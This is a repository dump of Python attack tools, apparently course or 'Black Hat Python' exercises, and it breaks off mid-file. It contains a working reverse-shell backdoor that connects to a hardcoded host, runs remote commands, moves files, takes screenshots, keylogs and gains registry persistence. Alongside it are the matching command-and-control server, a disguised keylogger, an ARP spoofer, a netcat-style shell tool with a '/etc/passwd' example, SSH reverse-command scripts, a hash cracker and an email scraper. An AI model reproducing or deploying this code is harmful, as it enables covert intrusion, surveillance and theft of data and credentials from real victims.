├── arpspoofer.py ├── backdoor.py ├── bh_sshRcmd.py ├── bh_sshcmd.py ├── bh_sshserver.py ├── bhnet.py ├── commandandcontrol.py ├── cracker+password.py ├── email-scarper.py ├── ipscan.py ├── keylogger.py ├── malarp.py ├── portscanner.py ├── proxy.py ├── rforward.py ├── server.py ├── sshbrute.py ├── sshbrutethreaded.py ├── tcp-client.py ├── tcp-server.py ├── udp-client.py ├── vulscan.py └── wireless.py /arpspoofer.py: -------------------------------------------------------------------------------- 1 | import scapy.all as scapy 2 | import sys 3 | import time 4 | 5 | def get_mac_address(ip_address): 6 | broadcast_layer = scapy.Ether(dst='ff:ff:ff:ff:ff:ff') 7 | arp_layer = scapy.ARP(pdst=ip_address) 8 | get_mac_packet = broadcast_layer/arp_layer 9 | answer = scapy.srp(get_mac_packet, timeout=2, verbose=False)[0] 10 | return answer[0][1].hwsrc 11 | 12 | def spoof(router_ip, target_ip, router_mac, target_mac): 13 | packet1 = scapy.ARP(op=2, hwdst=router_mac, pdst=router_ip, psrc=target_ip) 14 | packet2 = scapy.ARP(op=2, hwdst=target_mac, pdst=target_ip, psrc=router_ip) 15 | scapy.send(packet1) 16 | scapy.send(packet2) 17 | 18 | target_ip = str(sys.argv[2]) 19 | router_ip = str(sys.argv[1]) 20 | target_mac = str(get_mac_address(target_ip)) 21 | router_mac = str(get_mac_address(router_ip)) 22 | 23 | try: 24 | while True: 25 | spoof(router_ip, target_ip, router_mac, target_mac) 26 | time.sleep(2) 27 | except KeyboardInterrupt: 28 | print('Closing ARP Spoofer.') 29 | exit(0) -------------------------------------------------------------------------------- /backdoor.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import json 3 | import subprocess 4 | import time 5 | import os 6 | import pyautogui 7 | import keylogger 8 | import threading 9 | import shutil 10 | import sys 11 | 12 | def reliable_send(data): 13 | jsondata = json.dumps(data) 14 | s.send(jsondata.encode()) 15 | 16 | def reliable_recv(): 17 | data = '' 18 | while True: 19 | try: 20 | data = data + s.recv(1024).decode().rstrip() 21 | return json.loads(data) 22 | except ValueError: 23 | continue 24 | 25 | def download_file(file_name): 26 | f = open(file_name, 'wb') 27 | s.settimeout(1) 28 | chunk = s.recv(1024) 29 | while chunk: 30 | f.write(chunk) 31 | try: 32 | chunk = s.recv(1024) 33 | except socket.timeout as e: 34 | break 35 | s.settimeout(None) 36 | f.close() 37 | 38 | def upload_file(file_name): 39 | f = open(file_name, 'rb') 40 | s.send(f.read()) 41 | 42 | def screenshot(): 43 | myScreenshot = pyautogui.screenshot() 44 | myScreenshot.save('screen.png') 45 | 46 | def persist(reg_name, copy_name): 47 | file_location = os.environ['appdata'] + '\\' + copy_name 48 | try: 49 | if not os.path.exists(file_location): 50 | shutil.copyfile(sys.executable, file_location) 51 | subprocess.call('reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ' + reg_name + ' /t REG_SZ /d "' + file_location + '"', shell=True) 52 | reliable_send('[+] Created Persistence With Reg Key: ' + reg_name) 53 | else: 54 | reliable_send('[+] Persistence Already Exists') 55 | except: 56 | reliable_send('[+] Error Creating Persistence With The Target Machine') 57 | 58 | def connection(): 59 | while True: 60 | time.sleep(20) 61 | try: 62 | s.connect(('192.168.1.4', 5555)) 63 | shell() 64 | s.close() 65 | break 66 | except: 67 | connection() 68 | 69 | def shell(): 70 | while True: 71 | command = reliable_recv() 72 | if command == 'quit': 73 | break 74 | elif command == 'background': 75 | pass 76 | elif command == 'help': 77 | pass 78 | elif command == 'clear': 79 | pass 80 | elif command[:3] == 'cd ': 81 | os.chdir(command[3:]) 82 | elif command[:6] == 'upload': 83 | download_file(command[7:]) 84 | elif command[:8] == 'download': 85 | upload_file(command[9:]) 86 | elif command[:10] == 'screenshot': 87 | screenshot() 88 | upload_file('screen.png') 89 | os.remove('screen.png') 90 | elif command[:12] == 'keylog_start': 91 | keylog = keylogger.Keylogger() 92 | t = threading.Thread(target=keylog.start) 93 | t.start() 94 | reliable_send('[+] Keylogger Started!') 95 | elif command[:11] == 'keylog_dump': 96 | logs = keylog.read_logs() 97 | reliable_send(logs) 98 | elif command[:11] == 'keylog_stop': 99 | keylog.self_destruct() 100 | t.join() 101 | reliable_send('[+] Keylogger Stopped!') 102 | elif command[:11] == 'persistence': 103 | reg_name, copy_name = command[12:].split(' ') 104 | persist(reg_name, copy_name) 105 | elif command[:7] == 'sendall': 106 | subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE) 107 | else: 108 | execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE) 109 | result = execute.stdout.read() + execute.stderr.read() 110 | result = result.decode() 111 | reliable_send(result) 112 | 113 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 114 | connection() 115 | 116 | -------------------------------------------------------------------------------- /bh_sshRcmd.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import paramiko 3 | 4 | def ssh_command(ip, user, passwd, command): 5 | client = paramiko.SSHClient() 6 | # client can also support using key files 7 | # client.load_host_keys('/home/user/.ssh/known_hosts') 8 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 9 | client.connect(ip, username=user, password=passwd) 10 | ssh_session = client.get_transport().open_session() 11 | if ssh_session.active: 12 | ssh_session.send(command) 13 | print(ssh_session.recv(1024)) # read banner 14 | 15 | while True: 16 | # get the command from the SSH server 17 | command = ssh_session.recv(1024) 18 | try: 19 | cmd_output = subprocess.check_output(command.decode(), shell=True) 20 | ssh_session.send(cmd_output) 21 | except Exception as e: 22 | ssh_session.send(str(e)) 23 | client.close() 24 | return 25 | 26 | ssh_command('192.168.100.130', 'isaac', 'lovespython', 'ClientConnected') -------------------------------------------------------------------------------- /bh_sshcmd.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | 3 | 4 | def ssh_command(ip, user, passwd, command): 5 | client = paramiko.SSHClient() 6 | #client can also support using key files 7 | # client.load_host_keys('/home/user/.ssh/known_hosts') 8 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 9 | client.connect(ip, username=user, password=passwd) 10 | ssh_session = client.get_transport().open_session() 11 | if ssh_session.active: 12 | ssh_session.exec_command(command) 13 | print(ssh_session(1024)) 14 | return 15 | 16 | ssh_command('192.168.100.131', 'isaac', 'lovespython', 'ClientConnected') -------------------------------------------------------------------------------- /bh_sshserver.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import paramiko 3 | import threading 4 | import sys 5 | 6 | #using the server host key frorm the paramiko demo 7 | host_key = paramiko.RSAKey(filename='test_rsa.key') 8 | 9 | 10 | class Server(paramiko.ServerInterface): 11 | def __init__(self): 12 | self.event = threading.Event() 13 | 14 | def check_channel_request(self, kind, chanid): 15 | if kind == 'session': 16 | return paramiko.OPEN_SUCCEEDED 17 | return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED 18 | 19 | def check_auth_password(self, username, password): 20 | if username == 'root' and password == 'toor': 21 | return paramiko.AUTH_SUCCESSFUL 22 | return paramiko.AUTH_FAILED 23 | 24 | 25 | server = sys.argv[1] 26 | ssh_port = int(sys.argv[2]) 27 | 28 | try: 29 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 31 | sock.bind((server, ssh_port)) 32 | sock.listen(100) 33 | print("[+] Listening for connection...") 34 | client, addr = sock.accept() 35 | except Exception as e: 36 | print("[-] Listen failed: " + str(e)) 37 | sys.exit(1) 38 | 39 | print("[+] Got a connection!") 40 | 41 | try: 42 | #noinspection PyTypeChecker 43 | bhSession = paramiko.Transport(client) 44 | bhSession.add_server_key(host_key) 45 | server = Server() 46 | try: 47 | bhSession.start_server(server=server) 48 | except paramiko.SSHException: 49 | print("[-] SSH negotiation failed.") 50 | chan = bhSession.accept(20) 51 | print(chan.recv(1024)) 52 | chan.send("Welcome to bh_ssh!") 53 | while True: 54 | try: 55 | command = input("Enter command: ").strip("\n") 56 | if command != 'exit': 57 | chan.send(command) 58 | print(chan.recv(1024).decode(errors="ignore") + "\n") 59 | else: 60 | chan.send("exit") 61 | print("Exiting...") 62 | bhSession.close() 63 | raise Exception("exit") 64 | except KeyboardInterrupt: 65 | bhSession.close() 66 | except Exception as e: 67 | print("[-] Caught exception: " + str(e)) 68 | bhSession.close() 69 | finally: 70 | sys.exit(1) 71 | -------------------------------------------------------------------------------- /bhnet.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | import getopt 4 | import threading 5 | import subprocess 6 | 7 | #define some global variables 8 | listen = False 9 | command = False 10 | upload = False 11 | execute = "" 12 | target = "" 13 | upload_destination = "" 14 | port = 0 15 | 16 | 17 | #this runs a command and returns the ouput 18 | def run_command(cmd): 19 | #trim the newline 20 | cmd = cmd.rstrip() 21 | 22 | # run the command and get the output back 23 | try: 24 | output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, 25 | shell=True) 26 | except subprocess.subprocess.CalledProcessError as e: 27 | output = e.output 28 | 29 | #send the output back to the client 30 | return output 31 | 32 | 33 | #this handles incoming client connections 34 | def client_handler(client_socket): 35 | global upload 36 | global execute 37 | global command 38 | 39 | # check for upload 40 | if len(upload_destination): 41 | 42 | #read in all of the bytes and write to our destination 43 | file_buffer = "" 44 | 45 | #keep reading data until none is available 46 | while True: 47 | data = client_socket.recv(1024) 48 | 49 | if not data: 50 | break 51 | else: 52 | file_buffer += data 53 | 54 | #now we take these bytes and try to write them out 55 | try: 56 | file_descriptor = open(upload_destination, "wb") 57 | file_descriptor.write(file_buffer.encode('utf-8')) 58 | file_descriptor.close() 59 | 60 | # acknowledge that we wrote the file out 61 | client_socket.send( 62 | "Successfully saved file to %s\r\n" % upload_destination) 63 | except OSError: 64 | client_socket.send( 65 | "Failed to save file to %s\r\n" % upload_destination) 66 | 67 | # check for command execution 68 | if len(execute): 69 | # run the command 70 | output = run_command(execute) 71 | 72 | client_socket.send(output) 73 | 74 | # now we go into another loop if a command shell was requested 75 | if command: 76 | 77 | while True: 78 | #show a simple prompt 79 | client_socket.send(("").encode('utf-8')) 80 | 81 | # now we receive until we see a line feed (enter key) 82 | cmd_buffer = b'' 83 | while b"\n" not in cmd_buffer: 84 | cmd_buffer += client_socket.recv(1024) 85 | 86 | # we have a valid command so execute it and send back the results 87 | response = run_command(cmd_buffer) 88 | 89 | # send back the response 90 | client_socket.send(response) 91 | 92 | 93 | #this is for incoming connections 94 | def server_loop(): 95 | global target 96 | global port 97 | 98 | #if no target is defined then we listen on all interfaces 99 | if not len(target): 100 | target = "0.0.0.0" 101 | 102 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 103 | server.bind((target, port)) 104 | server.listen(5) 105 | 106 | while True: 107 | client_socket, addr = server.accept () 108 | 109 | # spin off a thread to handle our new client 110 | client_thread = threading.Thread(target=client_handler, 111 | args=(client_socket,)) 112 | 113 | client_thread.start() 114 | 115 | 116 | #if we don't listen we are a client... make it so, 117 | def client_sender(buffer): 118 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 119 | 120 | try: 121 | client.connect((target, port)) 122 | # connect to our target host 123 | 124 | # if we detect input from stdin send it 125 | #if no we are going to wait for the user to punch some in 126 | if len(buffer): 127 | client.send(buffer.encode('utf-8')) 128 | 129 | while True: 130 | #now we wait for the data back 131 | recv_len = 1 132 | response = b'' 133 | 134 | while recv_len: 135 | data = client.recv(4096) 136 | recv_len = 1 137 | response = b'' 138 | 139 | if recv_len < 4096: 140 | break 141 | 142 | print(response.decode('utf-8'), end=' ') 143 | 144 | # wait for more input 145 | buffer = input("") 146 | buffer += "\n" 147 | 148 | #send it off 149 | client.send(buffer.encode('utf-8')) 150 | 151 | except socket.error as exc: 152 | #just catch eneric errors - you can do your homework to beef this up 153 | print("[*] Exception Exiting.") 154 | print(f"[*] caught exception socket.error: {exc}") 155 | 156 | #teardown the connection 157 | client.close() 158 | 159 | def usage(): 160 | print("Netcat Replacement") 161 | print() 162 | print("Usage: bhpnet.py -t target_host -p port") 163 | print( 164 | "-l --listen - listen on [host]:[port] for incoming " 165 | "connections") 166 | print( 167 | "-e --execute=file_to_run - execute the given file upon receiving " 168 | "a connection") 169 | print("-c --command - initialize a command shell") 170 | print( 171 | "-u --upload=destination - upon receiving connection upload a file " 172 | "and write to [destination]") 173 | print() 174 | print() 175 | print("Examples: ") 176 | print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c") 177 | print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe") 178 | print("bhpnet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"") 179 | print("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135") 180 | sys.exit(0) 181 | 182 | 183 | def main(): 184 | global listen 185 | global port 186 | global execute 187 | global upload_destination 188 | global target 189 | 190 | if not len(sys.argv[1:]): 191 | usage() 192 | 193 | # read the commandline options 194 | try: 195 | opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", 196 | ["help", "listen", "execute", "target", 197 | "port", "command", "upload"]) 198 | for o, a in opts: 199 | if o in ("-h", "--help"): 200 | usage() 201 | elif o in ("-l", "--listen"): 202 | listen = True 203 | elif o in ("-e", "--execute"): 204 | execute = a 205 | elif o in ("-c", "--commandshell"): 206 | command = True 207 | elif o in ("-u", "--upload"): 208 | upload_destination = a 209 | elif o in ("-t", "--target"): 210 | target = a 211 | elif o in ("-p", "--port"): 212 | port = int(a) 213 | else: 214 | assert False, "Unhandled Option" 215 | 216 | except getopt.GetoptError as err: 217 | print(str(err)) 218 | usage() 219 | 220 | # are we going to listen or just send data from STDIN? 221 | if not listen and len(target) and port > 0: 222 | # read in the buffer from the commandline 223 | # this will block, so send CTRL-D if not sending input 224 | # to stdin 225 | buffer = sys.stdin.read() 226 | 227 | # send data off 228 | client_sender(buffer) 229 | 230 | # we are going to listen and potentially 231 | # upload things, execute commands and drop a shell back 232 | # depending on our command line options above 233 | if listen: 234 | server_loop() 235 | 236 | 237 | main() 238 | 239 | -------------------------------------------------------------------------------- /commandandcontrol.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import termcolor 3 | import json 4 | import os 5 | import threading 6 | 7 | 8 | 9 | def reliable_recv(target): 10 | data = '' 11 | while True: 12 | try: 13 | data = data + target.recv(1024).decode().rstrip() 14 | return json.loads(data) 15 | except ValueError: 16 | continue 17 | 18 | def reliable_send(target, data): 19 | jsondata = json.dumps(data) 20 | target.send(jsondata.encode()) 21 | 22 | def upload_file(target, file_name): 23 | f = open(file_name, 'rb') 24 | target.send(f.read()) 25 | 26 | def download_file(target, file_name): 27 | f = open(file_name, 'wb') 28 | target.settimeout(1) 29 | chunk = target.recv(1024) 30 | while chunk: 31 | f.write(chunk) 32 | try: 33 | chunk = target.recv(1024) 34 | except socket.timeout as e: 35 | break 36 | target.settimeout(None) 37 | f.close() 38 | 39 | 40 | def target_communication(target, ip): 41 | count = 0 42 | while True: 43 | command = input('* Shell~%s: ' % str(ip)) 44 | reliable_send(target, command) 45 | if command == 'quit': 46 | break 47 | elif command == 'background': 48 | break 49 | elif command == 'clear': 50 | os.system('clear') 51 | elif command[:3] == 'cd ': 52 | pass 53 | elif command[:6] == 'upload': 54 | upload_file(target, command[7:]) 55 | elif command[:8] == 'download': 56 | download_file(target, command[9:]) 57 | elif command[:10] == 'screenshot': 58 | f = open('screenshot%d' % (count), 'wb') 59 | target.settimeout(3) 60 | chunk = target.recv(1024) 61 | while chunk: 62 | f.write(chunk) 63 | try: 64 | chunk = target.recv(1024) 65 | except socket.timeout as e: 66 | break 67 | target.settimeout(None) 68 | f.close() 69 | count += 1 70 | elif command == 'help': 71 | print(termcolor.colored('''\n 72 | quit --> Quit Session With The Target 73 | clear --> Clear The Screen 74 | cd *Directory Name* --> Changes Directory On Target System 75 | upload *file name* --> Upload File To The target Machine 76 | download *file name* --> Download File From Target Machine 77 | keylog_start --> Start The Keylogger 78 | keylog_dump --> Print Keystrokes That The Target Inputted 79 | keylog_stop --> Stop And Self Destruct Keylogger File 80 | persistence *RegName* *fileName* --> Create Persistence In Registry'''),'green') 81 | else: 82 | result = reliable_recv(target) 83 | print(result) 84 | 85 | def accept_connections(): 86 | while True: 87 | if stop_flag: 88 | break 89 | sock.settimeout(1) 90 | try: 91 | target, ip = sock.accept() 92 | targets.append(target) 93 | ips.append(ip) 94 | print(termcolor.colored(str(ip) + ' has connected!', 'green')) 95 | except: 96 | pass 97 | 98 | 99 | targets = [] 100 | ips = [] 101 | stop_flag = False 102 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 103 | sock.bind(('192.168.1.9', 5555)) 104 | sock.listen(5) 105 | t1 = threading.Thread(target=accept_connections) 106 | t1.start() 107 | print(termcolor.colored('[+] Waiting For The Incoming Connections ...', 'green')) 108 | 109 | while True: 110 | command = input('[**] Command & Control Center: ') 111 | if command == 'targets': 112 | counter = 0 113 | for ip in ips: 114 | print('Session ' + str(counter) + ' --- ' + str(ip)) 115 | counter += 1 116 | elif command == 'clear': 117 | os.system('clear') 118 | elif command[:7] == 'session': 119 | try: 120 | num = int(command[8:]) 121 | tarnum = targets[num] 122 | tarip = ips[num] 123 | target_communication(tarnum, tarip) 124 | except: 125 | print('[-] No Session Under That ID Number') 126 | elif command == 'exit': 127 | for target in targets: 128 | reliable_send(target, 'quit') 129 | target.close() 130 | sock.close() 131 | stop_flag = True 132 | t1.join() 133 | break 134 | elif command[:4] == 'kill': 135 | targ = targets[int(command[5:])] 136 | ip = ips[int(command[5:])] 137 | reliable_send(targ, 'quit') 138 | targ.close() 139 | targets.remove(targ) 140 | ips.remove(ip) 141 | elif command[:7] == 'sendall': 142 | x = len(targets) 143 | print(x) 144 | i = 0 145 | try: 146 | while i < x: 147 | tarnumber = targets[i] 148 | print(tarnumber) 149 | reliable_send(tarnumber, command) 150 | i += 1 151 | except: 152 | print('Failed') 153 | else: 154 | print(termcolor.colored('[!!] Command Doesnt Exist', 'red')) 155 | 156 | -------------------------------------------------------------------------------- /cracker+password.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | 3 | type_of_hash = str(input('Which type of hash you want to bruteforce ?')) 4 | file_path = str(input('Enter path to the file to bruteforce with: ')) 5 | hash_to_decrypt = str(input('Enter Hash Value To Bruteforce: ')) 6 | 7 | with open(file_path, 'r') as file: 8 | for line in file.readlines(): 9 | if type_of_hash == 'md5': 10 | hash_object = hashlib.md5(line.strip().encode()) 11 | hashed_word = hash_object.hexdigest() 12 | if hashed_word == hash_to_decrypt: 13 | print('Found MD5 Password: ' + line.strip()) 14 | exit(0) 15 | 16 | if type_of_hash == 'sha1': 17 | hash_object = hashlib.sha1(line.strip().encode()) 18 | hashed_word = hash_object.hexdigest() 19 | if hashed_word == hash_to_decrypt: 20 | print('Found SHA1 Password: ' + line.strip()) 21 | exit(0) 22 | 23 | print('Password Not In File.') -------------------------------------------------------------------------------- /email-scarper.py: -------------------------------------------------------------------------------- 1 | from bs4 import BeautifulSoup 2 | import requests 3 | import requests.exceptions 4 | import urllib.parse 5 | from collections import deque 6 | import re 7 | 8 | user_url = str(input('[+] Enter Target URL To Scan: ')) 9 | urls = deque([user_url]) 10 | 11 | scraped_urls = set() 12 | emails = set() 13 | 14 | count = 0 15 | try: 16 | while len(urls): 17 | count += 1 18 | if count == 100: 19 | break 20 | url = urls.popleft() 21 | scraped_urls.add(url) 22 | 23 | parts = urllib.parse.urlsplit(url) 24 | base_url = '{0.scheme}://{0.netloc}'.format(parts) 25 | 26 | path = url[:url.rfind('/')+1] if '/' in parts.path else url 27 | 28 | print('[%d] Processing %s' % (count, url)) 29 | try: 30 | response = requests.get(url) 31 | except (requests.exceptions.MissingSchema, requests.exceptions.ConnectionError): 32 | continue 33 | 34 | new_emails = set(re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", response.text, re.I)) 35 | emails.update(new_emails) 36 | 37 | soup = BeautifulSoup(response.text, features="lxml") 38 | 39 | for anchor in soup.find_all("a"): 40 | link = anchor.attrs['href'] if 'href' in anchor.attrs else '' 41 | if link.startswith('/'): 42 | link = base_url + link 43 | elif not link.startswith('http'): 44 | link = path + link 45 | if not link in urls and not link in scraped_urls: 46 | urls.append(link) 47 | except KeyboardInterrupt: 48 | print('[-] Closing!') 49 | 50 | for mail in emails: 51 | print(mail) 52 | -------------------------------------------------------------------------------- /ipscan.py: -------------------------------------------------------------------------------- 1 | import portscanner 2 | 3 | ip = 'testphp.vulnweb.com' 4 | portscanner.scan(ip) -------------------------------------------------------------------------------- /keylogger.py: -------------------------------------------------------------------------------- 1 | import os 2 | from pynput.keyboard import Listener 3 | import time 4 | import threading 5 | 6 | 7 | class Keylogger(): 8 | keys = [] 9 | count = 0 10 | flag = 0 11 | path = os.environ['appdata'] +'\\processmanager.txt' 12 | #path = 'processmanager.txt' 13 | 14 | def on_press(self, key): 15 | self.keys.append(key) 16 | self.count += 1 17 | 18 | if self.count >= 1: 19 | self.count = 0 20 | self.write_file(self.keys) 21 | self.keys = [] 22 | 23 | def read_logs(self): 24 | with open(self.path, 'rt') as f: 25 | return f.read() 26 | 27 | def write_file(self, keys): 28 | with open(self.path, 'a') as f: 29 | for key in keys: 30 | k = str(key).replace("'", "") 31 | if k.find('backspace') > 0: 32 | f.write(' Backspace ') 33 | elif k.find('enter') > 0: 34 | f.write('\n') 35 | elif k.find('shift') > 0: 36 | f.write(' Shift ') 37 | elif k.find('space') > 0: 38 | f.write(' ') 39 | elif k.find('caps_lock') > 0: 40 | f.write(' caps_lock ') 41 | elif k.find('Key'): 42 | f.write(k) 43 | 44 | def self_destruct(self): 45 | self.flag = 1 46 | listener.stop() 47 | os.remove(self.path) 48 | 49 | def start(self): 50 | global listener 51 | with Listener(on_press=self.on_press) as listener: 52 | listener.join() 53 | 54 | if __name__ == '__main__': 55 | keylog = Keylogger() 56 | t = threading.Thread(target=keylog.start) 57 | t.start() 58 | while keylog.flag != 1: 59 | time.sleep(10) 60 | logs = keylog.read_logs() 61 | print(logs) 62 | #keylog.self_destruct() 63 | t.join() 64 | -------------------------------------------------------------------------------- /malarp.py: -------------------------------------------------------------------------------- 1 | from scapy.all import * 2 | -------------------------------------------------------------------------------- /portscanner.py: -------------------------------------------------------------------------------- 1 | import socket 2 | from IPy import IP 3 | 4 | def scan(target): 5 | converted_ip = check_ip(target) 6 | print('\n' + '[-_0 Scanning Target] ' + str(target)) 7 | for port in range(1,500): 8 | scan_port(converted_ip, port) 9 | 10 | def check_ip(ip): 11 | try: 12 | IP(ip) 13 | return(ip) 14 | except ValueError: 15 | return socket.gethostbyname(ip) 16 | 17 | def get_banner(s): 18 | return s.recv(1024) 19 | 20 | def scan_port(ipaddress, port): 21 | try: 22 | sock = socket.socket() 23 | sock.settimeout(0.5) 24 | sock.connect((ipaddress, port)) 25 | try: 26 | banner = get_banner(sock) 27 | print('[+] Open Port ' + str(port) + ' : ' + str(banner.decode().strip('\n'))) 28 | except: 29 | print('[+] Open Port ' + str(port)) 30 | except: 31 | pass 32 | 33 | 34 | if __name__ == "__main__": 35 | targets = input('[+] Enter Target/s To Scan(split multiple targets with ,): ') 36 | if ',' in targets: 37 | for ip_add in targets.split(','): 38 | scan(ip_add.strip(' ')) 39 | else: 40 | scan(targets) 41 | -------------------------------------------------------------------------------- /proxy.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import socket 3 | import threading 4 | 5 | 6 | # this is a pretty hex dumping function directly taken from 7 | # http://code.activestate.com/recipes/142812-hex-dumper/ 8 | 9 | def hexdump(src, length=16): 10 | result = [] 11 | digits = 4 if isinstance(src, str) else 2 12 | 13 | for i in range(0, len(src), length): 14 | s = src[i:i + length] 15 | hexa = b' '.join([b"%0*X" % (digits, ord(x)) for x in s]) 16 | text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s]) 17 | result.append( 18 | b"%04X %-*s %s" % (i, length * (digits + 1), hexa, text)) 19 | 20 | print(b'\n'.join(result)) 21 | 22 | 23 | def receive_from(connection): 24 | buffer = b'' 25 | 26 | # We set a 2 second time-out. Depending on your target this may need 27 | # to be adjusted 28 | connection.settimeout(2) 29 | 30 | try: 31 | 32 | # keep reading into the buffer until there's no more data or we 33 | # time-out 34 | while True: 35 | data = connection.recv(4096) 36 | if not data: 37 | break 38 | buffer += data 39 | 40 | except TimeoutError: 41 | pass 42 | 43 | return buffer 44 | 45 | 46 | # modify any requests destined for the remote host 47 | def request_handler(buffer): 48 | # perform packet modifications 49 | return buffer 50 | 51 | 52 | # modify any responses destined for the local host 53 | def response_handler(buffer): 54 | # perform packet modifications 55 | return buffer 56 | 57 | 58 | def proxy_handler(client_socket, remote_host, remote_port, receive_first): 59 | # connect to the remote host 60 | remote_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 61 | remote_socket.connect((remote_host, remote_port)) 62 | 63 | # receive data from the remote end if necessary 64 | if receive_first: 65 | remote_buffer = receive_from(remote_socket) 66 | hexdump(remote_buffer) 67 | 68 | # send it to our response handler 69 | remote_buffer = response_handler(remote_buffer) 70 | 71 | # if we have data to send to our local client send it 72 | if len(remote_buffer): 73 | print("[<==] Sending %d bytes to localhost." % len(remote_buffer)) 74 | client_socket.send(remote_buffer) 75 | 76 | # now let's loop and read from local, send to remote, send to local 77 | # rinse wash repeat 78 | while True: 79 | # read from local host 80 | local_buffer = receive_from(client_socket) 81 | 82 | if len(local_buffer): 83 | print("[==>] Received %d bytes from localhost." % len(local_buffer)) 84 | hexdump(local_buffer) 85 | 86 | # send it to our request handler 87 | local_buffer = request_handler(local_buffer) 88 | 89 | # send off the data to the remote host 90 | remote_socket.send(local_buffer) 91 | print("[==>] Sent to remote.") 92 | 93 | # receive back the response 94 | remote_buffer = receive_from(remote_socket) 95 | 96 | if len(remote_buffer): 97 | print("[<==] Received %d bytes from remote." % len(remote_buffer)) 98 | hexdump(remote_buffer) 99 | 100 | # send to our response handler 101 | remote_buffer = response_handler(remote_buffer) 102 | 103 | # send the response to the local socket 104 | client_socket.send(remote_buffer) 105 | 106 | print("[<==] Sent to localhost.") 107 | 108 | # if no more data on either side close the connections 109 | if not len(local_buffer) or not len(remote_buffer): 110 | client_socket.close() 111 | remote_socket.close() 112 | print("[*] No more data. Closing connections.") 113 | break 114 | 115 | 116 | def server_loop(local_host, local_port, remote_host, remote_port, 117 | receive_first): 118 | server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 119 | 120 | try: 121 | server.bind((local_host, local_port)) 122 | except socket.error as exc: 123 | print("[!!] Failed to listen on %s:%d" % (local_host, 124 | local_port)) 125 | print("[!!] Check for other listening sockets or correct " 126 | "permissions.") 127 | print(f"[!!] Caught exception error: {exc}") 128 | sys.exit(0) 129 | 130 | print("[*] Listening on %s:%d" % (local_host, local_port)) 131 | 132 | server.listen(5) 133 | 134 | while True: 135 | client_socket, addr = server.accept() 136 | 137 | # print out the local connection information 138 | print("[==>] Received incoming connection from %s:%d" % ( 139 | addr[0], addr[1])) 140 | 141 | # start a thread to talk to the remote host 142 | proxy_thread = threading.Thread(target=proxy_handler, args=( 143 | client_socket, remote_host, remote_port, receive_first)) 144 | proxy_thread.start() 145 | 146 | 147 | def main(): 148 | # no fancy command line parsing here 149 | if len(sys.argv[1:]) != 5: 150 | print("Usage: ./proxy.py [localhost] [localport] [remotehost] " 151 | "[remoteport] [receive_first]") 152 | print("Example: ./proxy.py 127.0.0.1 9000 10.12.132.1 9000 True") 153 | sys.exit(0) 154 | 155 | # setup local listening parameters 156 | local_host = sys.argv[1] 157 | local_port = int(sys.argv[2]) 158 | 159 | # setup remote target 160 | remote_host = sys.argv[3] 161 | remote_port = int(sys.argv[4]) 162 | 163 | # this tells our proxy to connect and receive data 164 | # before sending to the remote host 165 | receive_first = sys.argv[5] 166 | 167 | if "True" in receive_first: 168 | receive_first = True 169 | else: 170 | receive_first = False 171 | 172 | # now spin up our listening socket 173 | server_loop(local_host, local_port, remote_host, remote_port, receive_first) 174 | 175 | 176 | main() 177 | -------------------------------------------------------------------------------- /rforward.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (C) 2008 Robey Pointer 4 | # 5 | # This file is part of paramiko. 6 | # 7 | # Paramiko is free software; you can redistribute it and/or modify it under the 8 | # terms of the GNU Lesser General Public License as published by the Free 9 | # Software Foundation; either version 2.1 of the License, or (at your option) 10 | # any later version. 11 | # 12 | # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY 13 | # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR 14 | # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more 15 | # details. 16 | # 17 | # You should have received a copy of the GNU Lesser General Public License 18 | # along with Paramiko; if not, write to the Free Software Foundation, Inc., 19 | # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. 20 | 21 | """ 22 | Sample script showing how to do remote port forwarding over paramiko. 23 | 24 | This script connects to the requested SSH server and sets up remote port 25 | forwarding (the openssh -R option) from a remote port through a tunneled 26 | connection to a destination reachable from the local machine. 27 | """ 28 | 29 | import getpass 30 | import socket 31 | import select 32 | import sys 33 | import threading 34 | from optparse import OptionParser 35 | 36 | import paramiko 37 | 38 | SSH_PORT = 22 39 | DEFAULT_PORT = 4000 40 | 41 | g_verbose = True 42 | 43 | 44 | def handler(chan, host, port): 45 | sock = socket.socket() 46 | try: 47 | sock.connect((host, port)) 48 | except Exception as e: 49 | verbose("Forwarding request to %s:%d failed: %r" % (host, port, e)) 50 | return 51 | 52 | verbose( 53 | "Connected! Tunnel open %r -> %r -> %r" 54 | % (chan.origin_addr, chan.getpeername(), (host, port)) 55 